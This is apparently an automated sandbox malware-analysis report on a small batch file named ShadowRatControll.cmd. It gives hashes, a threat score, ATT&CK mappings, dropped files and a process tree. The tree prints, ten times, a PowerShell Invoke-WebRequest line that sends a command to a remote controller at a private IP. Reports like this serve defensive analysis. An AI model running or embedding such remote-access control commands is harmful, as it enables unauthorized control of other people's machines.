Overview

overview

10

Static

static

1

ShadowNet.cmd

windows10-2004-x64

10

ShadowRatControll.cmd

windows10-2004-x64

8

Analysis

  • max time kernel
    677s
  • max time network
    459s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-05-2024 11:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ShadowRatControll.cmd

  • Size

    527B

  • MD5

    07afb099a19e61130a3aa2a128ffdd97

  • SHA1

    b6ee5580018410b0a2d41c5282a39459fd937f3a

  • SHA256

    6a796d4829ed7e578d6a74a18774dd888db131029c19a0821c6b8d67efe2cfcc

  • SHA512

    dd90bd56faf45541c1a77f6b117119753fa28fcdd6fe657a6aa1a2418dfe4f403a89990371fe3e0c809bf6fafe6acfbd7034ebdc68bf924aef69a30817d4da43

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Powershell Invoke Web Request.

    execution
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ShadowRatControll.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3808
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "& { Invoke-WebRequest -Uri 'http://10.127.1.21:8080/?cmd=start https://www.google.com' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5016
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "& { Invoke-WebRequest -Uri 'http://10.127.1.21:8080/?cmd=start https://www.google.com' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4444
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "& { Invoke-WebRequest -Uri 'http://10.127.1.21:8080/?cmd=start https://www.google.com' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2068
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "& { Invoke-WebRequest -Uri 'http://10.127.1.21:8080/?cmd=start https://www.google.com' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3264
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "& { Invoke-WebRequest -Uri 'http://10.127.1.21:8080/?cmd=start https://www.google.com' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3200
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "& { Invoke-WebRequest -Uri 'http://10.127.1.21:8080/?cmd=start https://www.google.com' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2660
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "& { Invoke-WebRequest -Uri 'http://10.127.1.21:8080/?cmd=start https://www.google.com' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3848
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "& { Invoke-WebRequest -Uri 'http://10.127.1.21:8080/?cmd=start https://www.google.com' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3388
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "& { Invoke-WebRequest -Uri 'http://10.127.1.21:8080/?cmd=start https://www.google.com' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3364
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "& { Invoke-WebRequest -Uri 'http://10.127.1.21:8080/?cmd=start https://www.google.com' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3512

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    3c1874d59012129822dbc3517fe36d34

    SHA1

    c744b250f00881cb7e133303a4971d2c3dcffcde

    SHA256

    482bfb2fec66395fb01a9603018aa66324f7342a09c1211eba4623edd9e7b5a3

    SHA512

    aafd7b4d9b25153e73f80f1176528c2f4dd4fa26136ae00d973ef569872809ac8f99f9ab0a8431e3a1ba445781ad5795e071e9ab48c8a334b576123169203585

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    b66db53846de4860ca72a3e59b38c544

    SHA1

    2202dc88e9cddea92df4f4e8d83930efd98c9c5a

    SHA256

    b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030

    SHA512

    72eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    f844e18314690934a1c8554e734ed892

    SHA1

    2a6f91fb1a47342e4df91ff5e2bbe4044f70765f

    SHA256

    0d557b3425b5b9a7129233e45bd457eb3635f0905994c186c2f7416e46ac76e2

    SHA512

    0420bae6a9cf6ab28ca9dfeaf3409a0f7efad59318ac64179bb212aff7ea3681445c4099202c93a14ed39a9a36374c6da995d957ee538116174ec3c283a8f364

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    27348c7cdb74fbcf0a7b3bbfd742adab

    SHA1

    1fc409d25d89ea37e9ca20a6bc678c0f90f6260a

    SHA256

    bb3d92e4a3d17f157abce36b6ea89efb7d70638c9138634187d5d4783fcf0328

    SHA512

    c0e00b6d3ad05c0e93881575b48df70cea196ff1da732cc365d10b142dae6642be50344862778b010d6eb92b8acda4ec8f860c9d058ad366eff5bf9ebb3262b0

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    f2390a140bd0df42ae17f77d185174d5

    SHA1

    74c46f742117534331ec508dd43091d186fbb571

    SHA256

    9160766d6fd51d38c269a61093b5bbf83afd91d40a51e378c356e26a66b52a0a

    SHA512

    ff4560023aa574045c58d6d7075c38783efa4be400de3871a2ec5dda4752f486a8739c33fdce3f493070544ee3d6989dcadcb69ca68889039078041629426e17

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    a956b83d2a952a5bf9410baea2069424

    SHA1

    35d6d25014e94fa3ac0c7d31baf27b57dfd15a28

    SHA256

    493fd96a3145aa6e0a63bb383a3ebe6bd8a6b625c119d5c394e5ccf947ea67ab

    SHA512

    71e55191743b4438975f7d54f0f172aae7c0be56fb0d8ad4c0ef50ecd43bebe3545b0af5f4045428cedd95316f44245aa5edf1a53723773ade7ee4d8e8647f29

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    7d73a55944e0c70d65173521f2f24b0a

    SHA1

    7322bd48efab8b1d3566cbcf90bfde479ee165d3

    SHA256

    70263cbfdcf729edc8cd3163e7f0bcb4ab13b126561b2b05f5880f407cac8b38

    SHA512

    86904d99d31fe6f4fa5ade1195d68c45fd66029c4c7e39f97f1f3c07a617e4a5533093f4b7db31118b7669994137878a65f113f44df4675c0e5375e6ea0a26ef

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gqo0ahoj.o3h.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit
  • memory/4444-38-0x00007FFCCBE60000-0x00007FFCCC921000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/4444-35-0x00007FFCCBE60000-0x00007FFCCC921000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/4444-39-0x00007FFCCBE60000-0x00007FFCCC921000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/4444-37-0x00007FFCCBE60000-0x00007FFCCC921000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/4444-31-0x00007FFCCBE60000-0x00007FFCCC921000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/4444-33-0x00007FFCCBE60000-0x00007FFCCC921000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/4444-34-0x00007FFCCBE60000-0x00007FFCCC921000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/5016-0-0x00007FFCCBE63000-0x00007FFCCBE65000-memory.dmp
    Filesize

    8KB

    Download
  • memory/5016-16-0x00007FFCCBE60000-0x00007FFCCC921000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/5016-20-0x00007FFCCBE60000-0x00007FFCCC921000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/5016-17-0x00007FFCCBE60000-0x00007FFCCC921000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/5016-15-0x00007FFCCBE60000-0x00007FFCCC921000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/5016-14-0x00007FFCCBE63000-0x00007FFCCBE65000-memory.dmp
    Filesize

    8KB

    Download
  • memory/5016-13-0x00007FFCCBE60000-0x00007FFCCC921000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/5016-12-0x00007FFCCBE60000-0x00007FFCCC921000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/5016-11-0x00007FFCCBE60000-0x00007FFCCC921000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/5016-1-0x00000200A3930000-0x00000200A3952000-memory.dmp
    Filesize

    136KB

    Download